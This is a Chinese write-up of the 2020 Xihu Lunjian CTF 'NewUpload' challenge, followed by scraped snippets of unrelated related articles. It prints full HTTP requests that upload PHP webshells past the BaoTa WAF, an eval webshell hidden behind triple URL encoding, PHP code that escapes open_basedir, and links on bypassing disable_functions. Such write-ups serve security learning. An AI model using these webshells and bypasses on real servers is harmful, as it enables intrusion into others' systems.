西湖論劍NewUpload-過寶塔waf

阿新 • • 發佈：2020-10-09

0x00:上傳繞字尾的姿勢

方法1：檔名14.\np\nh\np繞過（如下0x01的方法1所示）

方法2：後來發現 0a汙染就能傳php了（https://ha1c9on.top/2020/10/09/xhlj-web/

0x01:繞過寶塔waf檢測的檔案內容書寫

方法1：檔名14.\np\nh\np繞過，用個deskop.ini做一下汙染寫馬。

POST /sandbox/i9pkda6liup7jd81uouov1agud/index.php HTTP/1.1
Host: upload.f28a18.challenge.gcsis.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15 
; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------31678586230937453831944973480
Content-Length: 561
Origin:  
http://upload.f28a18.challenge.gcsis.cn
Connection: close
Referer: http://upload.f28a18.challenge.gcsis.cn/sandbox/i9pkda6liup7jd81uouov1agud/index.php
Cookie: PHPSESSID=i9pkda6liup7jd81uouov1agud; dasctf_sign_cookie=19a5c3663736071e6e03dec07fccc64a; dasctf_sign_javascript=ac0efff678a5740be048702812fb377a
Upgrade-Insecure-Requests: 1

-----------------------------31678586230937453831944973480
Content-Disposition: form-data; name="file"; filename="14.
p
h
p"
Content-Type: image/jpeg

ï¿½ï¿½
[.ShellClassInfo]
LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21770
IconResource=%SystemRoot%\system32\imageres.dll,-112
IconFile=%SystemRoot%\system32\shell32.dll
IconIndex=-235

<? $_GET[0]($_GET[1]); phpinfo();?>


-----------------------------31678586230937453831944973480--

方法2：

測試後發現寶塔waf不能解析三次url編碼。。
<?php
eval(urldecode(urldecode(urldecode($_POST['ha1c9on']))));

方法3：實戰中收集的

POST /sandbox/qniqsah823r6ucvetcu1lt4jqp/index.php HTTP/1.1
Host: upload.c76b5a.challenge.gcsis.cn
Content-Length: 374
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://upload.c76b5a.challenge.gcsis.cn
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBnzp1nQO9cweRAeE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://upload.c76b5a.challenge.gcsis.cn/sandbox/qniqsah823r6ucvetcu1lt4jqp/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=1748fb8021e1a5-0ba0a1e1fa6337-15306251-1fa400-1748fb8021f9b0; SL_GWPT_Show_Hide_tmp=1; SL_wptGlobTipTmp=1; PHPSESSID=dhjn6me1bph963tssh9v1js8e5
Connection: close

------WebKitFormBoundaryBnzp1nQO9cweRAeE
Content-Disposition: form-data; name="file"; filename="llllll.php"
Content-Type: image/gif

GIF89a                  
<%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%><%%>....... <?php phpinfo();?>
------WebKitFormBoundaryBnzp1nQO9cweRAeE--

0x02:繞過open_basedir限制

方法1：先繞一下讀取目錄看看

<?php
mkdir('suanve');chdir('suanve');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');
var_dump(scandir("../../../../../../../../../../../../../".$_GET['dir']));

方法2：想辦法上傳成功，然後include這個檔案，就可以檢視根目錄檔案了

詳見p牛文章：https://www.leavesongs.com/PHP/php-bypass-open-basedir-list-directory.html

<?php
$file_list = array();
// normal files
$it = new DirectoryIterator("glob:///*");
foreach($it as $f) {
    $file_list[] = $f->__toString();
}
// special files (starting with a dot(.))
$it = new DirectoryIterator("glob:///.*");
foreach($it as $f) {
    $file_list[] = $f->__toString();
}
sort($file_list);
foreach($file_list as $f){
        echo "{$f}<br/>";
}
?>

方法3：詳見https://skysec.top/2019/06/10/2019%200ctf%20final%20Web%20Writeup%EF%BC%881%EF%BC%89/

通過修改var_dump(glob('*'));來控制訪問路徑詳見上文

chdir('/tmp');
mkdir('sky');
chdir('sky');
ini_set('open_basedir','..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
ini_set('open_basedir','/');
var_dump(ini_get('open_basedir'));
var_dump(glob('*'));

0x03:繞過disable_function

當發現phpinfo頁面開啟了 fpm，可以用以下的連結

打fpm繞過disable_function

https://skysec.top/2019/06/10/2019%200ctf%20final%20Web%20Writeup%EF%BC%881%EF%BC%89/ （2019 0ctf final Web Writeup

https://www.anquanke.com/post/id/186186#h3-5（位元組跳動的CTF比賽blog）

（或者直接上蟻劍的外掛庫）

https://www.mi1k7ea.com/2019/08/03/%E4%BB%8E%E8%9A%81%E5%89%91%E6%8F%92%E4%BB%B6%E7%9C%8B%E5%88%A9%E7%94%A8PHP-FPM%E7%BB%95%E8%BF%87disable-functions/

還有其他題的這種情況利用linux提供的LD_preload環境變數，劫持共享so

https://blog.csdn.net/mochu7777777/article/details/105136633/

西湖論劍NewUpload-過寶塔waf

0x00:上傳繞字尾的姿勢方法1：檔名14.\\np\\nh\\np繞過（如下0x01的方法1所示）方法2：後來發現 0a汙染就能傳php了（https://ha1c9on.top/2020/10/09/xhlj-web/

2020西湖論劍 baby writeup

原文連結:http://phoebe233.cn/?p=271 趙總殺我 NewUpload 有寶塔waf，上傳php檔案或者檔案內容包含php等都會502，然後504

西湖論劍2020線上初賽re之Cellular

西湖論劍re之Cellular 前言過程總結前言作為一個菜雞，從未體驗過用od和ida兩個結合在一起居然是如此的快樂，實在是太感動了（第一次用od整出了flag，快樂）

西湖論劍 Flagshop 分析復現

本文首發於“合天智匯”公眾號作者：xiaoleung title: 西湖論劍 Flagshop 分析復現

2021 西湖論劍・網路安全大會在杭州舉辦

4 月 25 日訊息以“安全：數字化改革之根基”為主題的 2021 西湖論劍・網路安全大會（第九屆“西湖論劍”）昨日在杭州順利舉行。

2021西湖論劍 Reverse(Re) Writeup(WP)

ROR 二進位制位線性變換，直接上z3。 from z3 import * box = [ 0x65, 0x08, 0xF7, 0x12, 0xBC, 0xC3, 0xCF, 0xB8, 0x83, 0x7B,

CTF論劍廠MISC(1)

1.頭像使用winhex開啟使用base64解密得llovethegirl 再使用MD5 32位加密即可得到答案

CTF論劍廠Web(1)

1.web26 這道題很簡單，繞過第一個if，進入第二個if即可第一個if是判斷str是否是數字，讓它不為數字即可

CTF_論劍場 MISC 頭像

CTF_論劍場 MISC 頭像本人第一次寫部落格的介紹正文第一步第二步第三步第四步

論劍場-misc-writeup-題目2020

題目：2020 下載發現是一個壓縮包，開啟以後裡面有3個檔案：一個壓縮包，2個加密了的txt檔案一開始什麼都不知道，看到有加密的檔案，我就直接拖到archpr中嘗試解密，結果發現出現這個介面網上查閱資料得知

Bugku-論劍場-MISC-snake

Misc-snake 2021年10月20日 17:17 描述:只要技術好，攢夠500分就給flag哦 hint:一定得讓我的Snake吃飽，不然他一不高興會出事的~~~

蟻劍特徵性資訊修改簡單過WAF

0x00 前言針對於蟻劍的特徵，對於流量傳輸中WAF檢測的繞過，打造武器庫，進行合理化的修改，例如請求頭的偽造，流量的加密等一些常用功能，這邊主要進行這幾部分的修改。

論做遊戲外掛，Python輸過誰？

玩過電腦遊戲的同學對於外掛肯定不陌生，但是你在用外掛的時候有沒有想過如何做一個外掛呢？

劍指offer-陣列中只出現過一次的數字

題目地址：https://www.nowcoder.com/practice/e02fdb54d7524710a7d664d082bb7811?tpId=13&&tqId=11193&rp=1&ru=/activity/oj&qru=/ta/coding-interviews/question-ranking

論“蹭熱點”，我只服“杜蕾斯”，今天咋們一起來盤點它曾蹭過的10大"神"熱點！...

點選上方藍色小字，關注“濤哥聊Python” 重磅乾貨，第一時間送達來源：資料分析與統計學之美

Linux 寶塔面板免費版開啟 waf 防火牆的方法

寶塔面板在 6.x 之前的版本中自帶了 Nginx 防火牆功能（Nginx管理 > 過濾器），到了 6.x 之後，，，為了推行收費版的防火牆外掛，寶塔官方把這個免費的防火牆入口給隱藏了。今天，就來說說如何開啟這個隱藏的 Ng

SQL注入過WAF思路

基礎大小寫 id=-1 uNIoN sELecT 1,2,3 雙寫 id=-1 UNIunionON SELselectECT 1,2,3 編碼 id=1%252f%252a*/UNION%252f%252a /SELECT

寶塔面板跳過繫結官方賬戶的方法

技術標籤：Linux系列今天老張在一臺客戶伺服器幫助安裝寶塔面板的時候，再正常的安裝最新版本之後登陸配置LNMP，居然提示彈出來要登入官方賬戶。賬戶我肯定是有的，但是一直沒有登陸過，不去他們論壇發帖，也不

《鬼谷八荒攻略》劍修指身法無傷過洪荒何羅魚方法洪荒何羅魚打法心得

《鬼谷八荒》洪荒難度下的戰鬥難度還是比較高的，無論是BOSS還是小怪都比較難纏，下面請看玩家“404的HK416本人”分享的《鬼谷八荒》劍修指身法無傷過洪荒何羅魚方法，希望能為各位玩家帶來一些幫助。

最新遊戲版號下發：NS 版《蠟燭人》、網易雷火《綠茵信仰》、西山居《劍網 1》過審

4 月 28 日訊息據國家新聞出版署官網公示，昨日日下發了新一批國產遊戲版號，共 86 款遊戲獲批，其中主機遊戲僅一款，為 NS 版《蠟燭人》，端遊有《最後的木頭》《綠蔭信仰》兩款，其他均為手遊。

西湖論劍NewUpload-過寶塔waf

相關推薦